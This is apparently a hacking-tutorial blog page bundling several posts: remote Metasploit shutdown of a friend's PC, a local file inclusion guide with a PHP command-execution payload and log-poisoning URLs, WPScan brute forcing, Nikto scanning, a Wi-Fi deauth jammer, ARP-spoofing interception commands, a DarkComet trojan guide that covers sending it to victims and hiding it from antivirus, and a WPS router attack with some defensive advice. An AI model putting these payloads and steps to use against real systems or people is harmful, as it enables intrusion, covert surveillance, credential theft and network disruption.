Spirited wolf's

How To shut down windows 7 Remotely

So, hello guys

This is Spirited wolf right here and today we are gonna talk about how can we Shutdown your friend/Client/Girlfriend PC's Remotely Using Metasploit :D 

And I am too lazy in writing so i just made a Video Demonstration so watch it ;) And i hope you will definitely enjoy this :) 

Please Subscribe our youtube channel::

Please like our facebook fan page::

LFI(local file inclusion)Penetrating Tutorial

originally Written By : "Fredrik Nordberg Almroth"

Local File Inclusion

As the title says, this is a "short" and descriptive guide about

various methods to exploit using a local file inclusion (LFI).

Check Video Tutorial

I will cover the following topics:

• Poison NULL Bytes

• Log Poisoning

• /proc/self/

• Alternative Log Poisoning

• Malicious image upload

• Injection of code by the use of e-mails

• Creativity

By: Fredrik Nordberg Almroth

So the question is. What is a LFI?

A LFI is, as the title says,

a method for servers/scripts to include local files on run-time,

in order to make complex systems of procedure calls.

Well most of the time, you find the LFI vulnerabilities in URL's

of the web pages.

Mainly because developers tend to like the use of GET requests

when including pages.

Nothing more. Nothing less.

So now, let's proceed shall we?

How do you find (fingerprint) them?

Let's say you find the following URL:



Notice, that this URL goes to the do.php which is a sub-domain to

It has several parameters for the internal do.php to parse, the
not and the for variable.

Let's study them a bit more.
The not variable contains the value of "exist.php", and the for
variable contains "real".

Now it turned pretty obvious, didn't it?
The not variable seem to take another PHP file as an argument,
most possibly for inclusion!


Let's try to play around with it!

Now what?

Let's try to tamper with the URL to see what we can do with it.

Let's change the content of the not variable to "/etc/passwd" and

see what happens.

Of course you can change the /etc/passwd to any other file of your
choice, but we'll just stick with it through out this tutorial.



Let's check the result!

If you get a result looking something like this:

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

Then sir. You've done it correctly. You've found a LFI


The /etc/passwd file is world-readable on *NIX systems.
That means, you can, by a 99% chance, read it.

Unless someone have changed permissions or changed the
open_basedir configuration.

But more of that some other time!

Now let's try another scenario.

Say the programmer of the website coded like this:

<?php “include/”.include($_GET['for'].“.php”); ?>

How would we do then? We can't read /etc/passwd because the script
appends .php to the end of the file.

What to do, what to do...

Gladly for you, there's another trick here.

Poison NULL Byte.

The NULL byte, is a special byte used everywhere in the background

of your computer (or your targets).

It's the binary representation of: 00000000.

Yes. 8 zero's in binary, or the hexadecimal representation of



One of the usages of this special byte is to terminate strings.

If you've been programming for a while, you must know what a
string is.

An amount of text! Okay, it sounds complex now.

But this method is really really simple.

To bypass the .php concatenation, we simply append after our



And hopefully, your result is once again:

root:x:0:0:root:/root:/bin/bash (…)

Awesome, we can now read any file on the server (with the
privileges the account on the server we've now obtained)!
Now you might ask, how can we execute code through this?
The answer is...

Log poisoning:

Say we're exploiting a plain normal Apache server.

By default, it create two log files called access_log and

error_log on the server.

If we tamper those logs we can successfully upload our own PHP

code on the server, which might give you remote command execution

if you wish, the choice is yours.

The question is, where are those logs stored?

Gladly for you, i've compiled a small list.
Here you go:


C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs

Now, there's two good methods for proceeding, depending of which
log you choose.

The best one (in my opinion) is by accessing the error_log.
This method is a little outside the box.

Say you find an LFI on this server, by simple going to this URL,
PHP code will be saved in the error_log:


Now try to reach it by going here:


If your result says something like Linux then your code execution
was successful.
Yeah yeah, you get the point. It gets stored in the error_log
because the
<?PHP $s=$_GET;@chdir($s['x']);echo@system($s['y'])?>

file do not exist.

Method #2; accessing the access_log. It's a little bit more

complicated, the best way to do this is to put PHP code in your


There's a great plug-in for Firefox called "User Agent Switcher"

to do this on the fly.

Other than that, it's the same thing.
Go to:

Or any other file accessible on the server, with your user-agent

spoofed to your PHP snippet.

Then go to the access_log in order to execute the code; eg:

http://site.com/this/exploit/do.php?for=/var/log/apache/logs/access_log&x=/&y=<<command goes here>>

Yeah sure, you're so cool, you can execute your own code! Now,let's be hardcore.

The Linux kernel is fascinating.
I'm not sure if you've heard of this, but the /proc/self is a symbolic link (symlink) going to the instance of the target HTTP
There is several things you can do by using this link, one is to
do the access_log-method, by simply spoofing your user-agent to
PHP code, then try to include

the /proc/self/environ.

Everyone knows that these days.

That's not fun. However your code will be executed!

Let's move on to more... Uncommon methods.

You can obtain the HTTP configuration file by simply trying to

include /proc/self/cmdline,

because most of the time the config file is set by a command-line

a simple, but a cool "feature", nothing malicious here, that's
just the way it works.

What you choose to do with the config file is up to you.
The log-file location(s) tend to be in there...

You got the grip now, I'll just keep writing.

There is yet another way to resolve the log-files by using this
link, by simply going to the file description of the log file (the
running stream).
• Yes

No need for you to run a dictionary-attack in order to resolve the
different log-files or to include the /proc/self/cmdline.

Now, how do we access those file descriptions?
Well sir, the /proc/self tend to have a folder (?) called fd.
You guessed it right.

fd do stand for file description.
The content within fd is numeric ID's going to different open

So the easiest way for us to find is, is to simply iterate our way


http://site.com/this/exploit/do.ph p ?

Sooner or later, you'll find one of the log-files.
By doing that you just go with the access_log or the error_log
Now seriously. Have you ever had any success with the ordinary
"Log Poisoning" methods?
I mean, in like 95% of the cases your requests gets URI encoded,
and by that ruining your code.
So here comes an alternative method:
Alternative Log Poisoning:
Apache got the tendency to log the Authorized user if any is
The Authorization header is a part of the HTTP protocol, I've bet
you've seen it.
It creates a prompt asking for a username and password as htaccess
do when you try to reach a protected folder.
Internet Explorer makes a prompt looking like this:
Yeah, well. The username and password gets sent base64 encoded
with : as a separator.
And as you might have figured out, the base64 wont get URIencoded!
So by providing this header in your HTTP request:
Authorization: Basic
The code will stay untouched, and simply unpacked by Apache
straight to the logs.
The base64 is the small PHP payload I've used earlier,
just with a : in the end to follow the HTTP RFC's.
Now when we're on to it, exploiting using different methods and
Why not exploit LFI with a JPG?
Malicious image upload:
Yes, you heard me. You can use a picture in order to execute code
by the use of a LFI vulnerability.
However you need special software to do this for you.
The attack consists in changing the EXIF data of the image of your
Say you're exploiting a community, which allows image uploads, for
let's say, your avatar.
By tampering with the EXIF data and by finding a LFI
you can take full control! Cool huh?
The EXIF data tend to hold what camera model, year, place,
location, etc... When the image was taken, but, as proven before,
it's rather easy to tamper with.
Injection of code by the use of e-mails:
Say your target server got port 109 or 110 open (POP2 or POP3) for
handling of e-mails.
You could send an e-mail to the HTTP server-user on target box.
Like: apache@site.com
And then try to include the /var/spool/mail/apache if this exists.
It's possible to execute through this as well.
However it's not very common to find this specific exploit.
Of course, the mail you send will contain the PHP code for you to
There is literary hundreds of ways to perform this attack
depending on the mail-server running back-end.
Qmail, for example, stores the incoming mails in /var/log/maillog
by default, but as been said before, this is thinking outside the
Why stop here?
I'm sure the Linux kernel, IRIX, AIM, Windows, SunOS, BSD and
other OS'es provides yet more interesting exploit scenarios.
Do they have SSH open?
If so, try to inject PHP code as the SSH username and go grab the
SSH log.
Will it work? Maybe?
Can the embedding of malicious content like the JPG EXIF field be
done withing a MP3 file?
Try it yourself. Be creative.

Please Subscribe our youtube channel::

Please like our facebook fan page::
How to hack a WordPress website with WPScan

This tutorial in the category WordPress hacking shows you how to scan WordPress for possible vulnerabilities and enumerate WordPress users. We will conclude this tutorial with a demonstration on how to brute force root passwords using WPScan in Kali Linux. WPScan is a black box WordPress vulnerability scanner and a must have tool for any WordPress web developer to scan for vulnerabilities and solve issues before they get exploited. Together with Nikto, a great webserver assessment tool, this tool should be part of any penetration test targeting a WordPress Website.
WPScan comes pre-installed on the following Linux distributions:

The latest version is WPScan 2.8 and the database currently contains:
  • Total vulnerable versions: 98
  • Total vulnerable plugins: 1.076
  • Total vulnerable themes: 361
  • Total version vulnerabilities: 1.104
  • Total plugin vulnerabilities: 1.763
  • Total theme vulnerabilities: 443

Windows is not supported by WPScan. The latest version is available for download at the following website(Linux & Mac): http://wpscan.org/

WPScan update

Start with the following command to update the vulnerabilities database:
wpscan –update

Scanning WordPress vulnerabilities

Than use the following command to scan a website for possible vulnerabilities:
wpscan –url [wordpress url]
WPscan WordPress vulnerability scanner

How to enumerate WordPress users

Use the following command to enumerate the WordPress users:

wpscan –url [wordpress url] –enumerate u

WPscan WordPress vulnerability scanner2

How to brute force the root password

Use the following command to brute force the password for user root:
wpscan –url [wordpress url] –wordlist [path to wordlist] –username [username to brute force] –threads [number of threads to use]
WPscan WordPress vulnerability scanner3

How to avoid WordPress User Enumeration

If you want to avoid WordPress user enumeration, you should avoid using the username as nickname and display name which is shown publicly. Best option is to choose an administrator username which consists of random characters and use another nickname. WPScan scans for usernames in the URL’s so if you won’t use the username it cannot be scanned by WPScan.

How to avoid Wordpres password brute forcing

The best way to keep attackers using brute force methods out is to limit the login attempts for and IP address. There are several plug-ins available for WordPress to limit login attempts. The latest WordPress versions have this option by default. Make sure you limit entries to a maximum of 3 and increase lock out time a lot after 2 lock outs (which is 6 password attempts).

Enumeration Arguments
Fin below an overview of enumeration arguments which can be used for scanning:

–enumerate | -e [option(s)] Enumeration.
option :
u – usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p – plugins
vp – only vulnerable plugins
ap – all plugins (can take a long time)
tt – timthumbs
t – themes
vt – only vulnerable themes
at – all themes (can take a long time)
Multiple values are allowed : “-e tt,p” will enumerate timthumbs and plugins

Please Subscribe our youtube channel::

Please like our facebook fan page::

Scanning Webservers with Nikto for vulnerabilities

Nikto is a very popular and easy to use webserver assessment tool to find potential problems and vulnerabilities very quickly. This tutorial shows you how to scan webservers for vulnerabilities using Nikto in Kali Linux. Nikto comes standard as a tool with Kali Linux and should be your first choice when pen testing webservers and web applications. Nikto is scanning for 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers as mentioned on the official Nikto website. Nikto comes with the following features:

These are some of the major features in the current version:

  • SSL Support (Unix with OpenSSL or maybe Windows with ActiveState’s
  • Full HTTP proxy support
  • Checks for outdated server components
  • Save reports in plain text, XML, HTML, NBE or CSV
  • Template engine to easily customize reports
  • Scan multiple ports on a server, or multiple servers via input file (including nmap output)
  • LibWhisker’s IDS encoding techniques
  • Easily updated via command line
  • Identifies installed software via headers, favicons and files
  • Host authentication with Basic and NTLM
  • Subdomain guessing
  • Apache and cgiwrap username enumeration
  • Mutation techniques to “fish” for content on web servers
  • Scan tuning to include or exclude entire classes of vulnerability
  • Guess credentials for authorization realms (including many default id/pw combos)
  • Authorization guessing handles any directory, not just the root
  • Enhanced false positive reduction via multiple methods: headers,
    page content, and content hashing
  • Reports “unusual” headers seen
  • Interactive status, pause and changes to verbosity settings
  • Save full request/response for positive tests
  • Replay saved positive requests
  • Maximum execution time per target
  • Auto-pause at a specified time
  • Checks for common “parking” sites
  • Logging to Metasploit
  • Thorough documentation

Another nice feature in Nikto is the possibility to define the test using the -Tuning parameter:

0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection

a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)

Scanning webservers with Nikto

Let’s start Nikto to scan for interesting files using the following command:
nikto -host [hostname or IP] -Tuning 1

Nikto webserver scanner kali
Nikto will display the Apache, OpenSSL and PHP version of the targeted webserver. Also it will give you an overview of possible vulnerabilities including the Open Source Vulnerabilities Database (OSVDB) reference. When you search the OSVDB website for the reference code it will explain the possible vulnerability in more detail. The OSVDB project currently covers 120,980 vulnerabilities, spanning 198,973 products from 4,735 researchers, over 113 years.
Run the following command to run all scans against a particular hosts. Please be a little patient because this might take a while to complete.
nikto -host [hostname or IP] -Tuning 1


Please Like our youtube channel::

Please like our facebook fan page::
Websploit Wifi Jammer

In this tutorial we will be exploring the Websploit Wifi Jammer module which we’ve edited to work with the latest version of Kali Linux. The Websploit Wifi Jammer module is a great tool to automatically disconnect every client connected to the targeted wireless network and access point. The WiFi Jammer module also prevents new and disconnected clients from connecting to the WiFi network. The module has been edited to work with Kali 2.0 and the new monitoring interface names (wlan0mon, wlan1mon etc.). For your convenience we’ve also set wlan0mon as the default interface. The edited Websploit Wifi Jammer module script can be downloaded using the following link:
In order to work with the new script in Websploit you have to replace the script in the following directory in Kali Linux with the downloaded script:

Websploit WiFi Jammer Tutorial

Open a new terminal and start websploit with the following command:
Websploit Wifi Jammer -1
Use the following command to show an overview of available modules from which we will select the Websploit WiFi Jammer module:
show modules
Websploit Wifi Jammer modules
Select the wifi/wifi_jammer module.
Use the following command to set the wifi/wifi_jammer module from the Wireless / Bluetooth modules section so we can configure the necessary parameters:
use wifi/wifi_jammer
Type the following command to show the available options for the Websploit WiFi Jammer module:
show options
Websploit Wifi Jammer Module Parameters
We need to specify the target’s BSSID, ESSID and the channel on which the access point is broadcasting. Also change the wireless interface and monitoring interface if needed. The default values for these parameters have been set to wlan0 and wlan0mon according the new naming format.
To determine the target’s BSSID, ESSID and channel you can use a tool like aircrack-ng or similar. It is beyond the scope of this tutorial to explain this process in detail. The following tutorials teach you how to use Airodump-ng which provide you with the necessary details (or watch the video tutorial at the bottom of this post):
Use the following set command in Websploit to set the parameters:
set channel [channel number]
Now type run to start the WiFi Jammer module on the specified target:
Websploit Wifi Jammer Running
Websploit Wifi Jammer running on the selected target.
Websploit Wifi Jammer disconnected
Disconnected and unable to connect again.
The Websploit WiFi Jammer module uses airodump-ng to determine connected clients and aireplay-ng to spam deauth messages to those connected clients. As you can see on the last screenshot we are disconnected on a Windows host and unable to connect again. This will remain this way until we stop the WiFi Jammer and close the aireplay-ng windows.
We’ve mentioned ‘connected clients’ a couple times throughout this tutorial. Note that a connected client can be anything from a regular desktop PC to WiFi Security cameras, home automation systems and any other system using WiFi for data transmission and operation. This is one of the many reasons why you should not us critical devices on wireless networks but use wired networks instead.

Please Like our youtube channel::

Please like our facebook fan page::

Men in middle attacks using ARP spoofing

Today we will learn how to perform Penetration testing of MITM attacks using ARP Spoofing. At first we must understand what is ARP spoofing and how hackers can use it to exploit and execute severe Men in Middle attacks.

ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker’s MAC address with the IP address of a legitimate computer or server on the network. Let’s see how to Pen test Man-In-The-Middle Attack by ARP spoofing of machine. So letz get started..

1).Kali Linux
3).Tools that are preinstalled on kali

Men in middle attacks using ARP spoofing

Step 1:
In this step we will scan the network for a victim’s computer which is alive using the most powerful scanner NMAP.
Here is the command to scan: nmap –F

ARP Spoofing Tutorial - Img1
Here my victims ip is

ARP Spoofing Tutorial - Img2
Penetration testing of Men in middle attacks using ARP spoofing – 2

Step 2:
Now lets setup a ip forwarding in the kali machine to enable victim to surf the web when he is attacked..
Command: echo 1 > /proc/sys/net/ipv4/ip_forward

Step 3:
Now lets arpsoof our victim whoes ip address is the following commands..
Command: arpspoof –i eth0 {here is my default gateway & eth0 is my Ethernet device}

ARP Spoofing Tutorial - Img3
Command2: arpspoof –i eth0
ARP Spoofing Tutorial - Img3-1

Step 4:
Now to test whether if man-in-the-middle attack is successful we use the tool that are pre-installed in kali..which are Driftnet and Urlsnarf
Open up a window and type driftnet –i eth0 which opens up a small window that captures all the graphics that the victim surf on the web..
Keeping up the above window open, Open up another window and type urlsnarf –i eth0 url snarf gives the details of the URL’s that the victim browse on the web.
Below is the screenshot of the successful Men in the Middle attack using ARP Spoofing..

ARP Spoofing Tutorial - Img4

That’s it, hope u liked our tutorial on Penetration testing of Men in middle attacks using ARP spoofing!! I will be coming up with much more tutorial..
Note : This was only for educational purpose..
Thank you!!

Please Like our youtube channel::

Please like our facebook fan page::

How To Use DarkComet

This tutorial will walk you through setting up a Remote Administration Tool (aka RAT or trojan) which you can use to send to your victim. Once they open your RAT file, you'll be able to access and control their computer as if you were sitting at it, download and execute files, retrieve saved passwords, look through their webcam, keylog, and more. What you need:
  1. Download DarkComet from the link above and open DarkComet.exe. If your anti-virus isn't turned off, it may flag this program as a virus. This is just a false positive, because the program is used to create viruses.
  2. Click DarkComet-RAT drop-down menu in the top left corner, then click Server Module > Minimalist
  3. Make the Stub ID whatever you want.
  4. For IP/DNS, put in your ACTUAL IP address, not your router IP. You can find your IP address by going to http://www.whatsmyip.org/
  5. Click the "Normal" button in the top left corner, choose a name for your server file and save it somewhere.
  6. If you haven't forwarded port 1604 yet, DO IT NOW. You can do this by typing your router IP address into your browser (usually or and logging into your router. Find the port forwarding option (every router is different) and forward port 1604 to your PC. If you don't know how to port forward, google port forwarding for your router or look in the manual for instructions. If you're not behind a router and are directly connected into your modem, this won't matter for you.
  7. Download and open SandBoxie. This is what we'll use to test the server safely on yourself to make sure it works. Make sure DarkComet is still open, and drag your newly created server file into the SandBoxie window. If prompted, choose to open on Default box. Once the server runs in SandBoxie, you should see a pop-up Dark Comet window letting you know a victim has connected. If nothing happens, you did something wrong (most likely ports aren't forwarded correctly)
  8. In the Dark Comet window, double click the victim that appeared in the list (you). You'll now see all the options available for you in the list on the left.
  9. Now all you do, is send your server file to your victim and when they open it, you'll have full access to them.
NOTE: Anti-Virus programs will flag your server, so your victim must not have any anti-virus software. To get around this, you need to crypt your server with a FUD (Fully-UnDetectable) Crypter. Anti-Virus programs are being updated all the time so a crypter that worked a month ago may not be FUD anymore. You must search around for crypters online through google or youtube, or create your own using the tutorial provided in this app. You may also choose to bind your server to an image file for example, to make it less suspicious, or you could send it using a java drive by. Creating a server is only the first step to successfully hacking your victims, the more time you spend working on it, the higher your chances of success.



Please Like our youtube channel::

Please like our facebook fan page::

TP Link Archer C5 Router Hacking

Today we got our hands on a brand new TP Link Archer C5 router which we will be testing for known vulnerabilities such as hidden backdoors and vulnerabilities, brute force default passwords and WPS vulnerabilities. In this new WiFi hacking tutorial we will be using different tools on Kali Linux 2.0 like Reaver, pixiewps and the Aircrack-nog suite to exploit possible vulnerabilities. TP Link is known to use easy to break default passwords such as the WPS PIN as default wireless password or a password which is derived directly from the MAC address. Especially the last one would make it very easy to retrieve the password because the MAC address is not meant to be secret and is actually send with every single wireless packet send from the router. With a packet analyser like Wireshark it is very easy to retrieve MAC addresses from sending and receiving devices, including the router. In this tutorial we’ll be using airodump-ng for this purpose.

TP Link Archer C5 Router Specifications

The TP Link Archer C5 Router is a consumer grade router priced at approximately $70,- dollars and offers a lot of value for the money. The router supports the 802.11 ac standard and offers dual band simultaneous 2.4GHz 300Mbps and 5GHz 867Mbps connections for a total available bandwidth of 1.2Gbps. Both IPv4 and IPv6 are supported by the router. The TP-Link Archer C5 has the following antennas and ports available:
  • 2 External detachable antenna
  • 1 Gigabit WAN port
  • 4 Gigabit LAN ports
  • 2 USB ports for external devices
The USB ports can be used for external devices such as storage devices or a shared printer. Something which seems to be a nice feature on the router is the option to install an isolated wireless guest network (with bandwidth control!) separated from your main network. With this feature you don’t have to worry about sharing the password from your main network with guests.
TP Link Archer C5 - front view 1
TP Link Archer C5 Front view
TP Link Archer C5 - rear view 2
TP Link Archer C5 Rear view

TP Link Archer C5 package contents

The contents of the package included:
  • AC1200 Wireless Dual Band Gigabit Router Archer C5
  • 2 detachable antennas
  • Power supply unit
  • Resource CD
  • Ethernet Cable
  • Quick Installation Guide
When we’re summing up the specifications and features of the TP Link Archer C5 router it seems like a great router for this price. This middle segment TP Link router is targeted at home and small office users. The router is very affordable for a lot of people and seems like a great alternative for the router provided by your ISP. All together this is enough reason to question and test the security of this router. Especially the target group of this TP Link router should think twice before they unpack the router as soon as possible to get it up and running as fast as possible to benefit from its great speed and features without even thinking about proper and safe configuration. Let’s continue this tutorial to see if and how we can hack and secure this router starting by looking at the default passwords.

TP Link Archer C5 Default passwords and settings

As we already expected the default password for the wireless network is the default WPS PIN which consists of 8 numbers. The C5 router we’re testing has the following default WPS PIN which is used as the default wireless key: 98159338. The default username and password to access the router settings is just like all TP Link routers:
Username: admin
Password: admin

TP Link Archer C5 Default SSID settings

The standard SSID name for the 2.4 GHz network is TP-LINK_A361 and for the 5 GHz network is TP-LINK_A360. The standard SSID is based on the routers MAC Address and consists of the last 4 digits of the MAC address subtracted by 1 for the 2.4 GHz SSID and subtracted by 2 with _5G added for the 5 GHz SSID.
TP Link Archer C5 - Label view 3
The MAC address is in hexadecimal notation so if the MAC address ends with a letter that letter is actually a number in decimal notation. For example when the MAC address ends with an A, which is hexadecimal for 10 in decimal, you should subtract 1 from 10 to determine the last digit of the default SSID which would be 9 in this case. If you want to calculate the last digit of the MAC address using the default SSID you would know that it would be A when the last digit of the default SSID is 9.
So far so good because there are TP Link routers around which have their default wireless password based on the MAC address. This is not the case for the TP Link Archer C5 router. Let’s continue with connecting the router and see if it has any WPS vulnerabilities we can exploit.

Scanning the TP Link Archer C5 for WPS vulnerabilities

Wi-Fi Protected Setup (WPS) provides simplified mechanisms connect to wireless networks with a PIN consisting of 8 numbers. The PIN exchange mechanism is vulnerable to brute-force attacks which will return the PIN and WPA key to the attack which can be used to connect to the wireless network. Theoretically there are 10^8 (= 100.000.000) possible values for the WPS PIN. Unfortunately the WPS PIN consists of 8 numbers divided into 3 segments from which can be tested separately with a brute force attack. The last digit is checksum which can be calculated. The PIN has been composed as following:
  • Part 1 of the pin is 5 digits = 10^4 (= 10.000) brute force attempts needed to retrieve this segment.
  • Part 2 of the PIN is 3 digits = 10^3 (1.000) brute force attempts needed to retrieve this segment.
  • Part 3 of the PIN is 1 digit which is a calculated checksum.
A WPS brute force tool like Reaver, which is included with Kali Linux, brute forces part 1 and 2 of the PIN in a maximum of 11.000 attempts. When a router is vulnerable to this WPS attack it will be 100% effective and grand the attacker access to your network no matter how strong the password is. During the attack with Reaver the attack has to be in range of the access point. A lot of routers nowadays have range limiting for WPS brute force attacks which means that the WPS part will lock up until it is manually unlocked by the owner of the router. During the lock it is not possible to brute force any of the WPS PIN segments. A commonly use method to avoid these lock up’s is MDK3 which can be used to force the router to reboot and release the WPS lock. MDK3 is depreciated nowadays and most routers are invulnerable to DOS attacks with MDK3. Many hackers are looking for new ways to force routers to reboot and unlock the rate limiting through vulnerabilities and exploits. It will probably be a matter of time before new methods pop up which do work.
WPS is enabled by default on the TP Link Archer C5 router so we will be checking it for known WPS vulnerabilities. We’ve done several tutorials on Hacking Tutorials about exploiting WPS vulnerabilities with Reaver and Pixiewps so we won’t get into great detail on these. For detailed tutorials on these subjects have a look at <tutorial name> and <tutorial name>. Let’s fire up Kali Linux and see if we can hack the TP Link Archer C5 router by brute forcing the WPS PIN with Reaver.

Brute forcing the Archer C5 WPS PIN with reaver

First we put our Wifi adapter in monitoring mode using the following command:
Airmon-ng start wlan0
The interface for the monitoring adapter will be wlan0mon. You will most likely receive a message about process who might cause trouble, kill them using the kill command. We can use airodump-ng to locate our access point and retrieve the MAC address. Use the following command to start airodump-ng:
airodump-ng –i wlan0mon
The MAC address appears in the first column which can be copied to your clipboard.
TP Link Archer C5 - Airmon-ng 5
Next we will use the following command to start Reaver:
reaver –I wlan0mon –b [router MAC address] –c [channel] –vv
The reaver attack will start testing some common PINS and will than start with 0 and work its way up to 9.999 for the first WPS PIN segment. As we already expected the TP Link router has rate limiting on the number of WPS attempts. It will lock up after a couple attempts and we need to unlock it manually. When the rate limiting occurs Reaver will throw a warning as following:
TP Link Archer C5 - Reaver Attack 6

TP Link Archer C5 Pixie dust attack

Another WPS vulnerability is known as the Pixie Dust Attack. The Pixie dust attack is performed with a modified version of Reaver with a secondary tool called pixiewps. The pixie dust attack is an offline WPS attack which means that the attackers retrieves the needed data in seconds which than can be used to retrieve the wireless password. This is only applicable to routers which are vulnerable to this attack. Let’s see if the TP Link Archer C5 is vulnerable to this offline pixie dust attack.
To start the pixie dust attack using Reaver use the following command:
reaver -i wlan0mon -b [Router MAC address] -c [channel] -vvv -K 1 –f
TP Link Archer C5 - Reaver Pixie dust Attack 6
Or use the following command to start pixiewps manually and supply the needed data yourself:
pixiewps -e [PKE] -s [EHASH1] -z [EHASH2] -a [AUTHKEY] -S
TP Link Archer C5 - Pixiewps 7
The TP Link Archer C5 router seems to be invulnerable to the pixie dust WPS attack. If a router is vulnerable than pixiewps will return the WPS PIN which can be used in Reaver to retrieve the WPA key using the following command:
reaver -i mon0 -c 1 -b [Router MAC] -vv -S –pin=[WPS PIN]
Let’s see if we run this command on the Archer C5 with the valid WPS PIN:
reaver -i mon0 -c 1 -b [Router MAC] –vv –d 0 –w –n -S –pin=98159338
TP Link Archer C5 - Reaver correct PIN 8
With the correct PIN Reaver will return the WPA PSK.
Although the access point locks itself up after a few attempts it is possible to retrieve the WPA PSK with the correct WPS PIN and Reaver.

Reversing the default WPS PIN

The remaining question now is how does the TP Link Archer C5 generates the default WPS PIN because every time we restore the WPS PIN it resets back to the same default PIN. Some router manufacturers, like Belkin (Belkin N900) and D-Link (D-Link DIR-810L), used to calculate the default PIN from the MAC address in the past which has been discovered by reversing engineering the algorithm. Other routers have the default PIN programmed in the NVRAM at the factory. NVRAM stands for Non-volatile random-access memory which is memory that retains the stored content after the power is turned off. Of course router manufacturers do not want to lose the default WPS PIN after powering off the device.
At this moment we do not know which method is used by TP-Link for restoring the default PIN of the Archer C5 router. If somebody succeeds in finding a method to reverse the default WPS PIN from static figures like the MAC Address or serial number it would leave a lot of routers vulnerable with WPS turned on. Retrieving the wireless password would then be as simple as feeding the PIN, BSSID and channel to Reaver as we’ve demonstrated earlier in this tutorial.

Defending against attackers exploiting WPS vulnerabilities

We always recommend you to turn off WPS in the router settings to prevent attackers from exploiting WPS vulnerabilities. Even though this router is not vulnerable to any of the tested WPS attacks, new WPS vulnerabilities can arise without you knowing it. Since routers basically have a long lifecycle (often without updates) when used in homes and small offices it is even more advised to turn this useless feature off. For the Archer C5 router you can simply access the wireless menu and turn WPS off using the ‘Disable WPS’ button as pictured below.
TP Link Archer C5 - WPS enabled by default 4
Disable WPS in this menu
Let’s continue to see if the router has any known backdoors or vulnerabilities in the next chapter.

TP Link Archer C5 Backdoors and Vulnerabilities

A good point to start searching for known backdoors and vulnerabilities for our TP Link Archer C5 router is the National Vulnerability Database and exploit database websites. On these websites we’ve came across two vulnerabilities for the Archer C5 router with a high severity rating; CVE-2015-3035 and CVE-2015-3036. Both vulnerabilities have been fixed already by the vendor through a firmware update in 2015.

CVE-2015-3035: Directory traversal vulnerability

This directory traversal vulnerability allows the remote attacker to read arbitrary files via a .. (dot dot) in the PATH_INFO to login/. This vulnerability affects the following TP Link router products including the Archer C5 router (Hardware version 1.2) with firmware before 150317:
  • TP-LINK Archer C5 (1.2) with firmware before 150317
  • C7 (2.0) with firmware before 150304
  • C8 (1.0) with firmware before 150316
  • Archer C9 (1.0)
  • TL-WDR3500 (1.0)
  • TL-WDR3600 (1.0)
  • TL-WDR4300 (1.0) with firmware before 150302
  • TL-WR740N (5.0)
  • TL-WR741ND (5.0) with firmware before 150312
  • TL-WR841N (9.0)
  • TL-WR841N (10.0)
  • TL-WR841ND (9.0)
  • TL-WR841ND (10.0) with firmware before 150310.

CVE-2015-3036: Stack-based buffer overflow in the KCodes NetUSB module

Stack-based buffer overflow in the run_init_sbus function in the KCodes NetUSB module for the Linux kernel. KCodes NetUSB is used in certain Netgear, TP-LINK, and other products and allows remote attackers to execute arbitrary code by providing a long computer name in a session on TCP port 20005. You can find more information about this vulnerability here:
And a full disclosure here:

How to avoid vulnerability exploits on your router

Both of the severe rated vulnerabilities show you the importance of keeping the firmware of your router up-to-date. CVE-2015-3035 and CVE-2015-3036 were fixed in 2015 for the Archer C5 with the following update: Archer C5(UN)_V2_150515. TP Link mentions the following about the update on their website:
  1. Fixed the security bug caused by overflowing of Kcodes buffer.
  2. Fixed the bug that you can access FTP Server from WAN port without password.
May 2015 may seem like a long time ago but in terms of security patches for consumer products it is like yesterday. I’m sure there are a lot of routers out there which haven’t been patched yet because many home and small office users do not check for firmware updates on a regular basis. New vulnerabilities are discovered all the time and often affect a lot of models as you can see in the affected model list for the directory traversal vulnerability CVE-2015-3035. Especially when drivers are affected which are used by a lot of vendors which was the case with the KCodes NetUSB in CVE-2015-3036. We advise you to check for firmware updates for any router on a regular basis and update it as soon as possible when a new version is available. You can find the firmware version of your router in the router settings under the System tools > Firmware update menu. Our Archer C5 was shipped with the 150515 firmware for which both vulnerabilities have been patched.

Brute forcing the TP Link Archer C5 default password

The default wireless password for the Archer C5 router is the default WPS PIN. The WPS PIN is an eight number figure which leaves us with 10^8 = 100.000.000 different possibilities if we would brute force the password. In the Cracking WPA with oclHashcat GPU on Windows tutorial from last year we’ve learned that an old video card like an AMD Radeon 7670M can do 20.000 attempts per second. A newer and more powerful video card like the AMD HD7970 can easily do 142.000 attempts per second. When we divide the 100 million possibilities by 142.000 it takes 705 seconds, which is less than 12 minutes, to brute force the password. Keep in mind that a newer and better performing video card could probably do it less than 10 minutes. With these figures coming from consumer grade hardware with really average processing power we’re still surprised that TP Link is using the default WPS PIN as default wireless password. If there was any good reason to do that, they could at least inform or warn the end user about changing the default wireless password to a more secure one. Last year we already did a tutorial on how brute force WPA passwords with the power of GPU’s. You can watch it here:
Let’s see if we can capture a WPA handshake, convert the captured .cap file to .hccap so we can use oclHashcat with a GPU to crack the password with oclHashcat. Theoretically it should take about 1.5 hours with 20k attempts per second.


Please Like our youtube channel::
Next PostNewer Posts Previous PostOlder Posts Home